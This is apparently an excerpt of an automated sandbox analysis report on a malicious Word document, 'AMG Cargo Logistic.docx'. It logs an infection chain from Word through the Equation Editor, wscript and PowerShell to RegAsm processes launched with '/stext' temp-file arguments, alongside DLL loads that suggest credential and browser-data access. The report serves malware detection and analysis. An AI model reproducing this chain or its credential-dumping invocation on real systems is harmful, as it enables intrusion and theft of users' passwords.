Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: AMG Cargo Logistic.LNK.0.drLNK file: ..\..\..\..\..\Desktop\AMG Cargo Logistic.docx
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image4.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image3.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/media/image2.emf
                  Source: AMG Cargo Logistic.docxInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000C.00000002.442998706.0000000002160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.442834589.00000000002B9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.448073583.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003E99000.00000004.00000800.00020000.00000000.sdmp
